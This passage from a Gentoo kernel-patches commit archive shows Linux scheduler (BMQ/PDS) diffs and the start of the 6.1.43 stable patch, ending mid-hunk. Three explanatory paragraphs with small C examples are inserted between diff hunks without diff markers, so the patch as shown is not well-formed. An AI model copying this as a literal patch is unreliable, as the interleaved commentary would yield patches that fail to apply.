- static inline u64 thermal_load_avg(struct rq *rq)
-@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
- 	return PELT_MIN_DIVIDER + avg->period_contrib;
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- static inline void cfs_se_util_change(struct sched_avg *avg)
- {
- 	unsigned int enqueued;
-@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
- 	return rq_clock_pelt(rq_of(cfs_rq));
- }
- #endif
-+#endif /* CONFIG_SCHED_ALT */
- 
- #else
- 
-+#ifndef CONFIG_SCHED_ALT
- static inline int
- update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
- {
-@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
- {
- 	return 0;
- }
-+#endif
- 
- static inline int
- update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
-diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
-index a4a20046e586..c363693cd869 100644
---- a/kernel/sched/sched.h
-+++ b/kernel/sched/sched.h
-@@ -5,6 +5,10 @@
- #ifndef _KERNEL_SCHED_SCHED_H
- #define _KERNEL_SCHED_SCHED_H
- 
-+#ifdef CONFIG_SCHED_ALT
-+#include "alt_sched.h"
-+#else
-+
- #include <linux/sched/affinity.h>
- #include <linux/sched/autogroup.h>
- #include <linux/sched/cpufreq.h>
-@@ -3183,4 +3187,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
- 	cgroup_account_cputime(curr, delta_exec);
- }
- 
-+static inline int task_running_nice(struct task_struct *p)
-+{
-+	return (task_nice(p) > 0);
-+}
-+#endif /* !CONFIG_SCHED_ALT */
- #endif /* _KERNEL_SCHED_SCHED_H */
-diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
-index 857f837f52cb..5486c63e4790 100644
---- a/kernel/sched/stats.c
-+++ b/kernel/sched/stats.c
-@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 	} else {
- 		struct rq *rq;
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 		struct sched_domain *sd;
- 		int dcount = 0;
-+#endif
- #endif
- 		cpu = (unsigned long)(v - 2);
- 		rq = cpu_rq(cpu);
-@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 		seq_printf(seq, "\n");
- 
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 		/* domain-specific stats */
- 		rcu_read_lock();
- 		for_each_domain(cpu, sd) {
-@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 			    sd->ttwu_move_balance);
- 		}
- 		rcu_read_unlock();
-+#endif
- #endif
- 	}
- 	return 0;
-diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
-index 84a188913cc9..53934e7ef5db 100644
---- a/kernel/sched/stats.h
-+++ b/kernel/sched/stats.h
-@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
- 
- #endif /* CONFIG_SCHEDSTATS */
- 
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_FAIR_GROUP_SCHED
- struct sched_entity_stats {
- 	struct sched_entity     se;
-@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
- #endif
- 	return &task_of(se)->stats;
- }
-+#endif /* CONFIG_SCHED_ALT */
- 
- #ifdef CONFIG_PSI
- void psi_task_change(struct task_struct *task, int clear, int set);
-diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
-index 8739c2a5a54e..d8dd6c15eb47 100644
---- a/kernel/sched/topology.c
-+++ b/kernel/sched/topology.c
-@@ -3,6 +3,7 @@
-  * Scheduler topology setup/handling methods
-  */
- 
-+#ifndef CONFIG_SCHED_ALT
- DEFINE_MUTEX(sched_domains_mutex);
- 
- /* Protected by sched_domains_mutex: */
-@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
-  */
- 
- static int default_relax_domain_level = -1;
-+#endif /* CONFIG_SCHED_ALT */
- int sched_domain_level_max;
- 
-+#ifndef CONFIG_SCHED_ALT
- static int __init setup_relax_domain_level(char *str)
- {
- 	if (kstrtoint(str, 0, &default_relax_domain_level))
-@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
- 
- 	return sd;
- }
-+#endif /* CONFIG_SCHED_ALT */
- 
- /*
-  * Topology list, bottom-up.
-@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
- 	sched_domain_topology_saved = NULL;
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_NUMA
- 
- static const struct cpumask *sd_numa_mask(int cpu)
-@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
- 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
- 	mutex_unlock(&sched_domains_mutex);
- }
-+#else /* CONFIG_SCHED_ALT */
-+void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
-+			     struct sched_domain_attr *dattr_new)
-+{}
-+
-+#ifdef CONFIG_NUMA
-+int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
-+{
-+	return best_mask_cpu(cpu, cpus);
-+}
-+#endif /* CONFIG_NUMA */
-+#endif
-diff --git a/kernel/sysctl.c b/kernel/sysctl.c
-index c6d9dec11b74..2bc42ce8b48e 100644
---- a/kernel/sysctl.c
-+++ b/kernel/sysctl.c
-@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
- 
- /* Constants used for minimum and maximum */
- 
-+#ifdef CONFIG_SCHED_ALT
-+extern int sched_yield_type;
-+#endif
-+
- #ifdef CONFIG_PERF_EVENTS
- static const int six_hundred_forty_kb = 640 * 1024;
- #endif
-@@ -1633,6 +1637,7 @@ int proc_do_static_key(struct ctl_table *table, int write,
- }
- 
- static struct ctl_table kern_table[] = {
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_NUMA_BALANCING
- 	{
- 		.procname	= "numa_balancing",
-@@ -1652,6 +1657,7 @@ static struct ctl_table kern_table[] = {
- 		.extra1		= SYSCTL_ZERO,
- 	},
- #endif /* CONFIG_NUMA_BALANCING */
-+#endif /* !CONFIG_SCHED_ALT */
- 	{
- 		.procname	= "panic",
- 		.data		= &panic_timeout,
-@@ -1953,6 +1959,17 @@ static struct ctl_table kern_table[] = {
- 		.proc_handler	= proc_dointvec,
- 	},
- #endif
-+#ifdef CONFIG_SCHED_ALT
-+	{
-+		.procname	= "yield_type",
-+		.data		= &sched_yield_type,
-+		.maxlen		= sizeof (int),
-+		.mode		= 0644,
-+		.proc_handler	= &proc_dointvec_minmax,
-+		.extra1		= SYSCTL_ZERO,
-+		.extra2		= SYSCTL_TWO,
-+	},
-+#endif
- #if defined(CONFIG_S390) && defined(CONFIG_SMP)
- 	{
- 		.procname	= "spin_retry",
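
The yield_type entry above is clamped to 0..2 by the SYSCTL_ZERO/SYSCTL_TWO bounds through proc_dointvec_minmax; the semantics of the three values live in alt_core.c, which this hunk does not show. A sketch of flipping the knob from user space, assuming a kernel built with CONFIG_SCHED_ALT:

#include <stdio.h>

int main(void)
{
	/* only present when the kernel is built with CONFIG_SCHED_ALT */
	FILE *f = fopen("/proc/sys/kernel/yield_type", "w");

	if (!f)
		return 1;
	/* proc_dointvec_minmax with SYSCTL_ZERO/SYSCTL_TWO: only 0..2 valid */
	fputs("0\n", f);
	return fclose(f) ? 1 : 0;
}
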
-diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
-index 3ae661ab6260..35f0176dcdb0 100644
---- a/kernel/time/hrtimer.c
-+++ b/kernel/time/hrtimer.c
-@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
- 	int ret = 0;
- 	u64 slack;
- 
-+#ifndef CONFIG_SCHED_ALT
- 	slack = current->timer_slack_ns;
- 	if (dl_task(current) || rt_task(current))
-+#endif
- 		slack = 0;
- 
- 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
-diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
-index cb925e8ef9a8..67d823510f5c 100644
---- a/kernel/time/posix-cpu-timers.c
-+++ b/kernel/time/posix-cpu-timers.c
-@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
- 	u64 stime, utime;
- 
- 	task_cputime(p, &utime, &stime);
--	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
-+	store_samples(samples, stime, utime, tsk_seruntime(p));
- }
- 
- static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
-@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
- 	}
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- static inline void check_dl_overrun(struct task_struct *tsk)
- {
- 	if (tsk->dl.dl_overrun) {
-@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
- 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
- 	}
- }
-+#endif
- 
- static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
- {
-@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
- 	u64 samples[CPUCLOCK_MAX];
- 	unsigned long soft;
- 
-+#ifndef CONFIG_SCHED_ALT
- 	if (dl_task(tsk))
- 		check_dl_overrun(tsk);
-+#endif
- 
- 	if (expiry_cache_is_inactive(pct))
- 		return;
-@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
- 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
- 	if (soft != RLIM_INFINITY) {
- 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
--		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
-+		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
- 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
- 
- 		/* At the hard limit, send SIGKILL. No further action. */
-@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
- 			return true;
- 	}
- 
-+#ifndef CONFIG_SCHED_ALT
- 	if (dl_task(tsk) && tsk->dl.dl_overrun)
- 		return true;
-+#endif
- 
- 	return false;
- }
-diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
-index a2d301f58ced..2ccdede8585c 100644
---- a/kernel/trace/trace_selftest.c
-+++ b/kernel/trace/trace_selftest.c
-@@ -1143,10 +1143,15 @@ static int trace_wakeup_test_thread(void *data)
- {
- 	/* Make this a -deadline thread */
- 	static const struct sched_attr attr = {
-+#ifdef CONFIG_SCHED_ALT
-+		/* No deadline on BMQ/PDS, use RR */
-+		.sched_policy = SCHED_RR,
-+#else
- 		.sched_policy = SCHED_DEADLINE,
- 		.sched_runtime = 100000ULL,
- 		.sched_deadline = 10000000ULL,
- 		.sched_period = 10000000ULL
-+#endif
- 	};
- 	struct wakeup_test_data *x = data;
- 

diff --git a/5021_BMQ-and-PDS-gentoo-defaults.patch b/5021_BMQ-and-PDS-gentoo-defaults.patch
deleted file mode 100644
index 6dc48eec..00000000
--- a/5021_BMQ-and-PDS-gentoo-defaults.patch
+++ /dev/null
@@ -1,13 +0,0 @@
---- a/init/Kconfig	2023-02-13 08:16:09.534315265 -0500
-+++ b/init/Kconfig	2023-02-13 08:17:24.130237204 -0500
-@@ -867,8 +867,9 @@ config UCLAMP_BUCKETS_COUNT
- 	  If in doubt, use the default value.
- 
- menuconfig SCHED_ALT
-+	depends on X86_64
- 	bool "Alternative CPU Schedulers"
--	default y
-+	default n
- 	help
- 	  This feature enables the alternative CPU schedulers.
- 

diff --git a/5022_BMQ-and-PDS-remove-psi-support.patch b/5022_BMQ-and-PDS-remove-psi-support.patch
deleted file mode 100644
index 4390e2d5..00000000
--- a/5022_BMQ-and-PDS-remove-psi-support.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-From 542887ccaeadc65843ec171bccc87f8aa8bbca95 Mon Sep 17 00:00:00 2001
-From: Alfred Chen <cchalpha@gmail.com>
-Date: Wed, 26 Apr 2023 16:38:14 +0000
-Subject: [PATCH] sched/alt: Remove psi support
-
-There are issues (#70, #72, #79) with psi support. Remove psi
-support, as it doesn't bring much gain.
----
- init/Kconfig             | 1 +
- kernel/sched/alt_core.c  | 8 --------
- kernel/sched/alt_sched.h | 1 -
- 3 files changed, 1 insertion(+), 9 deletions(-)
-
-diff --git a/init/Kconfig b/init/Kconfig
-index 454f792df9dd..dff86592555a 100644
---- a/init/Kconfig
-+++ b/init/Kconfig
-@@ -629,6 +629,7 @@ config TASK_IO_ACCOUNTING
- 
- config PSI
- 	bool "Pressure stall information tracking"
-+	depends on !SCHED_ALT
- 	help
- 	  Collect metrics that indicate how overcommitted the CPU, memory,
- 	  and IO capacity are in the system.
-diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
-index af4d840d4bb7..37dfdc41d2a7 100644
---- a/kernel/sched/alt_core.c
-+++ b/kernel/sched/alt_core.c
-@@ -588,7 +588,6 @@ static void update_rq_clock_task(struct rq *rq, s64 delta)
- 
- 	rq->prev_irq_time += irq_delta;
- 	delta -= irq_delta;
--	psi_account_irqtime(rq->curr, irq_delta);
- #endif
- #ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
- 	if (static_key_false((&paravirt_steal_rq_enabled))) {
-@@ -769,7 +768,6 @@ unsigned long get_wchan(struct task_struct *p)
-  */
- #define __SCHED_DEQUEUE_TASK(p, rq, flags, func)				\
- 	sched_info_dequeue(rq, p);						\
--	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
- 										\
- 	list_del(&p->sq_node);							\
- 	if (list_empty(&rq->queue.heads[p->sq_idx])) { 				\
-@@ -779,7 +777,6 @@ unsigned long get_wchan(struct task_struct *p)
- 
- #define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
- 	sched_info_enqueue(rq, p);					\
--	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
- 									\
- 	p->sq_idx = task_sched_prio_idx(p, rq);				\
- 	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
-@@ -2954,7 +2951,6 @@ static int try_to_wake_up(struct task_struct *p, unsigned int state,
- 		}
- 
- 		wake_flags |= WF_MIGRATED;
--		psi_ttwu_dequeue(p);
- 		set_task_cpu(p, cpu);
- 	}
- #else
-@@ -4828,8 +4824,6 @@ static void __sched notrace __schedule(unsigned int sched_mode)
- 		 */
- 		++*switch_count;
- 
--		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
--
- 		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
- 
- 		/* Also unlocks the rq: */
-@@ -7689,8 +7683,6 @@ void __init sched_init(void)
- 	sched_init_topology_cpumask_early();
- #endif /* SMP */
- 
--	psi_init();
--
- 	preempt_dynamic_init();
- }
- 
-diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
-index 9fe45bf0cedf..55a15b806e87 100644
---- a/kernel/sched/alt_sched.h
-+++ b/kernel/sched/alt_sched.h
-@@ -3,7 +3,6 @@
- 
- #include <linux/context_tracking.h>
- #include <linux/profile.h>
--#include <linux/psi.h>
- #include <linux/stop_machine.h>
- #include <linux/syscalls.h>
- #include <linux/tick.h>
--- 
-GitLab
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-03 11:48 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-03 11:48 UTC (permalink / raw
  To: gentoo-commits

commit:     63f745d3bfaa0f9081cd6dcc923f9a1e63a5b6be
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Aug  3 11:48:10 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Aug  3 11:48:10 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=63f745d3

Linux patch 6.1.43

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1042_linux-6.1.43.patch | 11447 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11451 insertions(+)

diff --git a/0000_README b/0000_README
index e4fa9ccf..a70a1aed 100644
--- a/0000_README
+++ b/0000_README
@@ -211,6 +211,10 @@ Patch:  1041_linux-6.1.42.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.42
 
+Patch:  1042_linux-6.1.43.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.43
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1042_linux-6.1.43.patch b/1042_linux-6.1.43.patch
new file mode 100644
index 00000000..e3d49117
--- /dev/null
+++ b/1042_linux-6.1.43.patch
@@ -0,0 +1,11447 @@
+diff --git a/Documentation/ABI/testing/sysfs-module b/Documentation/ABI/testing/sysfs-module
+index 08886367d0470..62addab47d0c5 100644
+--- a/Documentation/ABI/testing/sysfs-module
++++ b/Documentation/ABI/testing/sysfs-module
+@@ -60,3 +60,14 @@ Description:	Module taint flags:
+ 			C   staging driver module
+ 			E   unsigned module
+ 			==  =====================
++
++What:		/sys/module/grant_table/parameters/free_per_iteration
++Date:		July 2023
++KernelVersion:	6.5 but backported to all supported stable branches
++Contact:	Xen developer discussion <xen-devel@lists.xenproject.org>
++Description:	Read and write number of grant entries to attempt to free per iteration.
++
++		Note: Future versions of Xen and Linux may provide a better
++		interface for controlling the rate of deferred grant reclaim
++		or may not need it at all.
++Users:		Qubes OS (https://www.qubes-os.org)
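
Because free_per_iteration is a plain module parameter, the new ABI file behaves like any other sysfs attribute. A small sketch reading it back, assuming a Xen guest running a kernel with this backport:

#include <stdio.h>

int main(void)
{
	const char *path =
		"/sys/module/grant_table/parameters/free_per_iteration";
	unsigned int n;
	FILE *f = fopen(path, "r");

	if (!f)
		return 1;	/* not a Xen guest, or parameter absent */
	if (fscanf(f, "%u", &n) == 1)
		printf("grant entries freed per iteration: %u\n", n);
	return fclose(f) ? 1 : 0;
}
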
+diff --git a/Documentation/admin-guide/security-bugs.rst b/Documentation/admin-guide/security-bugs.rst
+index 82e29837d5898..5a6993795bd26 100644
+--- a/Documentation/admin-guide/security-bugs.rst
++++ b/Documentation/admin-guide/security-bugs.rst
+@@ -63,31 +63,28 @@ information submitted to the security list and any followup discussions
+ of the report are treated confidentially even after the embargo has been
+ lifted, in perpetuity.
+ 
+-Coordination
+-------------
+-
+-Fixes for sensitive bugs, such as those that might lead to privilege
+-escalations, may need to be coordinated with the private
+-<linux-distros@vs.openwall.org> mailing list so that distribution vendors
+-are well prepared to issue a fixed kernel upon public disclosure of the
+-upstream fix. Distros will need some time to test the proposed patch and
+-will generally request at least a few days of embargo, and vendor update
+-publication prefers to happen Tuesday through Thursday. When appropriate,
+-the security team can assist with this coordination, or the reporter can
+-include linux-distros from the start. In this case, remember to prefix
+-the email Subject line with "[vs]" as described in the linux-distros wiki:
+-<http://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists>
++Coordination with other groups
++------------------------------
++
++The kernel security team strongly recommends that reporters of potential
++security issues NEVER contact the "linux-distros" mailing list until
++AFTER discussing it with the kernel security team.  Do not Cc: both
++lists at once.  You may contact the linux-distros mailing list after a
++fix has been agreed on and you fully understand the requirements that
++doing so will impose on you and the kernel community.
++
++The different lists have different goals and the linux-distros rules do
++not contribute to actually fixing any potential security problems.
+ 
+ CVE assignment
+ --------------
+ 
+-The security team does not normally assign CVEs, nor do we require them
+-for reports or fixes, as this can needlessly complicate the process and
+-may delay the bug handling. If a reporter wishes to have a CVE identifier
+-assigned ahead of public disclosure, they will need to contact the private
+-linux-distros list, described above. When such a CVE identifier is known
+-before a patch is provided, it is desirable to mention it in the commit
+-message if the reporter agrees.
++The security team does not assign CVEs, nor do we require them for
++reports or fixes, as this can needlessly complicate the process and may
++delay the bug handling.  If a reporter wishes to have a CVE identifier
++assigned, they should find one by themselves, for example by contacting
++MITRE directly.  However under no circumstances will a patch inclusion
++be delayed to wait for a CVE identifier to arrive.
+ 
+ Non-disclosure agreements
+ -------------------------
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index 55492fea44276..bbc80eff03f98 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -52,6 +52,9 @@ stable kernels.
+ | Allwinner      | A64/R18         | UNKNOWN1        | SUN50I_ERRATUM_UNKNOWN1     |
+ +----------------+-----------------+-----------------+-----------------------------+
+ +----------------+-----------------+-----------------+-----------------------------+
++| Ampere         | AmpereOne       | AC03_CPU_38     | AMPERE_ERRATUM_AC03_CPU_38  |
+++----------------+-----------------+-----------------+-----------------------------+
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A510     | #2457168        | ARM64_ERRATUM_2457168       |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A510     | #2064142        | ARM64_ERRATUM_2064142       |
+diff --git a/Documentation/trace/kprobetrace.rst b/Documentation/trace/kprobetrace.rst
+index 4274cc6a2f94f..08a2a6a3782f0 100644
+--- a/Documentation/trace/kprobetrace.rst
++++ b/Documentation/trace/kprobetrace.rst
+@@ -58,8 +58,8 @@ Synopsis of kprobe_events
+   NAME=FETCHARG : Set NAME as the argument name of FETCHARG.
+   FETCHARG:TYPE : Set TYPE as the type of FETCHARG. Currently, basic types
+ 		  (u8/u16/u32/u64/s8/s16/s32/s64), hexadecimal types
+-		  (x8/x16/x32/x64), "string", "ustring" and bitfield
+-		  are supported.
++		  (x8/x16/x32/x64), "string", "ustring", "symbol", "symstr"
++		  and bitfield are supported.
+ 
+   (\*1) only for the probe on function entry (offs == 0).
+   (\*2) only for return probe.
+@@ -96,6 +96,10 @@ offset, and container-size (usually 32). The syntax is::
+ 
+ Symbol type('symbol') is an alias of u32 or u64 type (depends on BITS_PER_LONG)
+ which shows given pointer in "symbol+offset" style.
++On the other hand, symbol-string type ('symstr') converts the given address to
++"symbol+offset/symbolsize" style and stores it as a null-terminated string.
++With the 'symstr' type, you can filter the event with a wildcard pattern
++on the symbol names, without having to resolve the symbol addresses
++yourself.
+ For $comm, the default type is "string"; any other type is invalid.
+ 
+ .. _user_mem_access:
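
The practical difference: 'symbol' records a pointer-sized value that is rendered as symbol+offset at print time, while 'symstr' stores the resolved name itself as a string, so event filters can match it with wildcards. A hypothetical setup via C, where call_timer_fn and its second (function-pointer) argument are assumptions, not taken from this patch:

#include <stdio.h>

int main(void)
{
	FILE *f = fopen("/sys/kernel/tracing/kprobe_events", "a");

	if (!f)
		return 1;
	/*
	 * Hypothetical probe: resolve call_timer_fn()'s function-pointer
	 * argument to "symbol+offset/size" text via the new symstr type.
	 * Assumes the function is probeable and $argN fetching works on
	 * this architecture.
	 */
	fputs("p:timerfn call_timer_fn fn=$arg2:symstr\n", f);
	return fclose(f) ? 1 : 0;
}
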
+diff --git a/Makefile b/Makefile
+index b569bed800521..69cdd0d2946c3 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 42
++SUBLEVEL = 43
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index 20ee745c118ae..d5eb2fbab473e 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -376,6 +376,25 @@ menu "Kernel Features"
+ 
+ menu "ARM errata workarounds via the alternatives framework"
+ 
++config AMPERE_ERRATUM_AC03_CPU_38
++	bool "AmpereOne: AC03_CPU_38: Certain bits in the Virtualization Translation Control Register and Translation Control Registers do not follow RES0 semantics"
++	default y
++	help
++	  This option adds an alternative code sequence to work around Ampere
++	  erratum AC03_CPU_38 on AmpereOne.
++
++	  The affected design reports FEAT_HAFDBS as not implemented in
++	  ID_AA64MMFR1_EL1.HAFDBS, but (V)TCR_ELx.{HA,HD} are not RES0
++	  as required by the architecture. The unadvertised HAFDBS
++	  implementation suffers from an additional erratum where hardware
++	  A/D updates can occur after a PTE has been marked invalid.
++
++	  The workaround forces KVM to explicitly set VTCR_EL2.HA to 0,
++	  which avoids enabling unadvertised hardware Access Flag management
++	  at stage-2.
++
++	  If unsure, say Y.
++
+ config ARM64_WORKAROUND_CLEAN_CACHE
+ 	bool
+ 
+diff --git a/arch/arm64/kernel/cpu_errata.c b/arch/arm64/kernel/cpu_errata.c
+index 89ac00084f38a..8dbf3c21ea22a 100644
+--- a/arch/arm64/kernel/cpu_errata.c
++++ b/arch/arm64/kernel/cpu_errata.c
+@@ -722,6 +722,13 @@ const struct arm64_cpu_capabilities arm64_errata[] = {
+ 		MIDR_FIXED(MIDR_CPU_VAR_REV(1,1), BIT(25)),
+ 		.cpu_enable = cpu_clear_bf16_from_user_emulation,
+ 	},
++#endif
++#ifdef CONFIG_AMPERE_ERRATUM_AC03_CPU_38
++	{
++		.desc = "AmpereOne erratum AC03_CPU_38",
++		.capability = ARM64_WORKAROUND_AMPERE_AC03_CPU_38,
++		ERRATA_MIDR_ALL_VERSIONS(MIDR_AMPERE1),
++	},
+ #endif
+ 	{
+ 	}
+diff --git a/arch/arm64/kernel/fpsimd.c b/arch/arm64/kernel/fpsimd.c
+index 656f613bacf7a..59aaf2e688336 100644
+--- a/arch/arm64/kernel/fpsimd.c
++++ b/arch/arm64/kernel/fpsimd.c
+@@ -871,6 +871,8 @@ int vec_set_vector_length(struct task_struct *task, enum vec_type type,
+ 	if (task == current)
+ 		put_cpu_fpsimd_context();
+ 
++	task_set_vl(task, type, vl);
++
+ 	/*
+ 	 * Free the changed states if they are not in use, SME will be
+ 	 * reallocated to the correct size on next use and we just
+@@ -885,8 +887,6 @@ int vec_set_vector_length(struct task_struct *task, enum vec_type type,
+ 	if (free_sme)
+ 		sme_free(task);
+ 
+-	task_set_vl(task, type, vl);
+-
+ out:
+ 	update_tsk_thread_flag(task, vec_vl_inherit_flag(type),
+ 			       flags & PR_SVE_VL_INHERIT);
+diff --git a/arch/arm64/kvm/hyp/pgtable.c b/arch/arm64/kvm/hyp/pgtable.c
+index cdf8e76b0be14..ae5f6b5ac80fd 100644
+--- a/arch/arm64/kvm/hyp/pgtable.c
++++ b/arch/arm64/kvm/hyp/pgtable.c
+@@ -595,12 +595,22 @@ u64 kvm_get_vtcr(u64 mmfr0, u64 mmfr1, u32 phys_shift)
+ 		lvls = 2;
+ 	vtcr |= VTCR_EL2_LVLS_TO_SL0(lvls);
+ 
++#ifdef CONFIG_ARM64_HW_AFDBM
+ 	/*
+ 	 * Enable the Hardware Access Flag management, unconditionally
+-	 * on all CPUs. The features is RES0 on CPUs without the support
+-	 * and must be ignored by the CPUs.
++	 * on all CPUs. In systems that have asymmetric support for the feature
++	 * this allows KVM to leverage hardware support on the subset of cores
++	 * that implement the feature.
++	 *
++	 * The architecture requires VTCR_EL2.HA to be RES0 (thus ignored by
++	 * hardware) on implementations that do not advertise support for the
++	 * feature. As such, setting HA unconditionally is safe, unless you
++	 * happen to be running on a design that has unadvertised support for
++	 * HAFDBS. Here be dragons.
+ 	 */
+-	vtcr |= VTCR_EL2_HA;
++	if (!cpus_have_final_cap(ARM64_WORKAROUND_AMPERE_AC03_CPU_38))
++		vtcr |= VTCR_EL2_HA;
++#endif /* CONFIG_ARM64_HW_AFDBM */
+ 
+ 	/* Set the vmid bits */
+ 	vtcr |= (get_vmid_bits(mmfr1) == 16) ?
+diff --git a/arch/arm64/tools/cpucaps b/arch/arm64/tools/cpucaps
+index f1c0347ec31a8..14d31d1b2ff02 100644
+--- a/arch/arm64/tools/cpucaps
++++ b/arch/arm64/tools/cpucaps
+@@ -71,6 +71,7 @@ WORKAROUND_2064142
+ WORKAROUND_2077057
+ WORKAROUND_2457168
+ WORKAROUND_2658417
++WORKAROUND_AMPERE_AC03_CPU_38
+ WORKAROUND_TRBE_OVERWRITE_FILL_MODE
+ WORKAROUND_TSB_FLUSH_FAILURE
+ WORKAROUND_TRBE_WRITE_OUT_OF_RANGE
+diff --git a/arch/loongarch/Kconfig b/arch/loongarch/Kconfig
+index 51d738ac12e55..e737dc8cd660c 100644
+--- a/arch/loongarch/Kconfig
++++ b/arch/loongarch/Kconfig
+@@ -10,6 +10,7 @@ config LOONGARCH
+ 	select ARCH_ENABLE_MEMORY_HOTPLUG
+ 	select ARCH_ENABLE_MEMORY_HOTREMOVE
+ 	select ARCH_HAS_ACPI_TABLE_UPGRADE	if ACPI
++	select ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE
+ 	select ARCH_HAS_PTE_SPECIAL
+ 	select ARCH_HAS_TICK_BROADCAST if GENERIC_CLOCKEVENTS_BROADCAST
+ 	select ARCH_INLINE_READ_LOCK if !PREEMPTION
+diff --git a/arch/loongarch/net/bpf_jit.h b/arch/loongarch/net/bpf_jit.h
+index 093885539e701..684b22f54ccc6 100644
+--- a/arch/loongarch/net/bpf_jit.h
++++ b/arch/loongarch/net/bpf_jit.h
+@@ -148,7 +148,7 @@ static inline void move_imm(struct jit_ctx *ctx, enum loongarch_gpr rd, long imm
+ 			 * no need to call lu32id to do a new filled operation.
+ 			 */
+ 			imm_51_31 = (imm >> 31) & 0x1fffff;
+-			if (imm_51_31 != 0 || imm_51_31 != 0x1fffff) {
